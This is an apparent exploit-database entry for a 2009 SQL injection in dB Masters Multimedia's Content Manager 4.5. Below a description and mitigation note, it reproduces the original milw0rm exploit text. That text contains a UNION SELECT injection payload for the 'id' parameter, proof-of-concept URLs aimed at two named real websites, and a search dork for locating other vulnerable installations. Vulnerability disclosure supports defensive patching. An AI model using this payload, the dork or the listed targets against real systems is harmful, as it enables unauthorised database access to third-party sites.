dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability

vendor:

Content Manager

by:

NoGe

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Content Manager

Affected Version From: 4.5

Affected Version To: 4.5

Patch Exists: Yes

Related CWE: N/A

CPE: a:dbmasters:content_manager:4.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

dB Masters Multimedia’s Content Manager 4.5 SQL Injection Vulnerability

The vulnerability exists in the index.php file of dB Masters Multimedia's Content Manager version 4.5. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the index.php file. An example of a malicious SQL query is '-57+union+select+1,version()--'. This will allow the attacker to execute arbitrary SQL commands on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.

Source

Exploit-DB raw data:

===========================================================================================


  [o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability

       Software : dB Masters Multimedia's Content Manager version 4.5
       Vendor   : http://www.dbmasters.net/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===========================================================================================


  [o] Vulnerable file

       index.php



  [o] Exploit

       http://localhost/[path]/index.php?n=xx&id=[SQL]



  [o] Proof of concept

       http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
       http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--



  [o] Dork

       "Powered by dB Masters Multimedia's Content Manager"


===========================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/news ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
       H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===========================================================================================

# milw0rm.com [2009-07-16]